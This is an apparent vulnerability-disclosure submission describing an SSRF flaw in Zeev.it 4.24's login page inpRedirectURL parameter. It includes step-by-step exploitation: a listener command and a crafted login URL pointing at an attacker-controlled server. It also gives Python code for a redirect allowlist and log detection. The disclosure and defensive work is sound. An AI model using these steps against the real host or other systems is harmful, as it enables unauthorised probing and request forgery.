Submit #511708: https://stoque.com.br Zeev 4.24 Zeev.it SSRF via inpRedirectURL Parameter on the Login Page

Title: https://stoque.com.br Zeev 4.24 Zeev.it SSRF via inpRedirectURL Parameter on the Login Page

Description:

Proof of Concept (PoC) - SSRF on Zeev.it (Version 4.24)

PoC link: https://drive.google.com/file/d/17QAEbzVIjTUj8FDOVMwfl9-7j8LRcK4V/view?usp=sharing

About Zeev.it

Zeev.it is a business process automation (BPM) platform developed by Stoque (https://stoque.com.br/). It allows workflows to be created and managed in an intuitive way. Used by several organizations to optimize internal processes, the system provides functionality for task approval, document management and integration with other services.

Vulnerability Description

The vulnerability identified in the Zeev.it system allows a Server-Side Request Forgery (SSRF) attack through the inpRedirectURL parameter. An attacker can manipulate requests made by the application server and redirect them to external servers under their control.

Exploitation Scenario

During the analysis of the application, a task for approval was received in the Zeev.it system. The URL provided was:

https://vp4mtgxk.r.us-east-1.awstrack.me/L0/https:%2F%2Fish.zeev.it%2Fmy%2Ftasks/1/01000195488f2e53-225aba4a-ac85-4834-a12f-eb153cb5a24c-000000/fn3qgU20a7bgypJyFAQiBonoJ1s=415

After accessing this URL, it was identified that the application redirects to the following vulnerable endpoint:

https://domain.zeev.it/login?inpLostSession=1&inpRedirectURL=%2F2.0%2Ftask%3Fc%3DV2L3cAEPruaV76FQ2IrzlEgRiHoLXgqU9lFiu%252bLIBYh%252fdUmaQoUwIXKbXcO%252fSsvc

Step-by-Step Exploitation

1. Configure a server to capture SSRF requests:
   python3 -m http.server 8000
2. Create a malicious URL to force the server to connect to our control server:
   https://ish.zeev.it/login?inpLostSession=1&inpRedirectURL=http://<YOUR_SERVER>:9000/
3. Monitor incoming requests:
   SSRF server running on port 8000...
   SSRF Detected: x.x.x.x -> /?t=m5g3M3eI9/uHe92X...
4. The attack was also successfully performed using Burp Suite and Burp Collaborator, intercepting and modifying the request to test different domains and endpoints.
Impact

This vulnerability could allow an attacker to use the application server as a proxy to access other resources, masking their identity and potentially accessing sensitive information.

Recommendations

• Implement whitelisting to restrict redirects to trusted domains only.
• Validate and sanitize user-supplied input to the inpRedirectURL parameter.
• Monitor HTTP request logs for potential exploit attempts.
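The first two recommendations reduce to one check on the redirect target, and the third reduces to running that same check over logged request lines. The code below is an added example illustrating both; it is not part of the submission or of Stoque's product. It assumes the application's own host is ish.zeev.it (taken from the URLs above), that the framework hands inpRedirectURL to the handler already URL-decoded once, and the request lines it parses are constructed.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Hosts the login page may redirect to (constructed from the URLs in the
# report; a real deployment would load this from configuration).
ALLOWED_HOSTS = {"ish.zeev.it"}


def safe_redirect_target(raw: str, default: Optional[str] = "/") -> Optional[str]:
    """Return a redirect target that stays on the application's origin.

    `raw` is the inpRedirectURL value as the web framework delivers it
    (already URL-decoded once). Accepted: a same-origin path starting with
    a single '/', or an https URL whose host is in ALLOWED_HOSTS. Anything
    else (http://, protocol-relative //host, backslash or userinfo tricks,
    empty input) yields `default`.
    """
    if not raw:
        return default
    # Browsers treat '\' like '/', so '/\evil' would otherwise pass as a path.
    value = raw.strip().replace("\\", "/")
    if value.startswith("/") and not value.startswith("//"):
        parts = urlsplit(value)
        target = parts.path
        if parts.query:
            target += "?" + parts.query
        return target  # same-origin path; fragment dropped
    parts = urlsplit(value)
    if parts.scheme != "https" or not parts.hostname:
        return default
    if parts.username is not None or parts.password is not None:
        return default  # https://trusted@evil/ actually resolves to 'evil'
    if parts.hostname.lower() not in ALLOWED_HOSTS:
        return default
    return value


def flags_off_origin_redirect(request_line: str) -> bool:
    """True when a logged request line ('GET /login?... HTTP/1.1') carries an
    inpRedirectURL the validator above would refuse, i.e. a candidate
    exploit attempt worth alerting on."""
    fields = request_line.split(" ")
    path = fields[1] if len(fields) > 1 else fields[0]
    query = parse_qs(urlsplit(path).query)  # decodes each value once
    return any(
        safe_redirect_target(candidate, default=None) is None
        for candidate in query.get("inpRedirectURL", [])
    )
```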
Source: https://ish.zeev.it/login?inpLostSession=1&inpRedirectURL=http://x.x.x.x:8000
User: Samuel Jesus (UID 81288)
Submission: 28.02.2025 15:55 (1 year ago)
Moderation: 11.03.2025 07:56 (11 days later)
Status: Accepted
VulDB Entry: 299217 [Stoque Zeev.it 4.24 Login Page /Login?inpLostSession=1 inpRedirectURL privilege escalation]
Points: 20
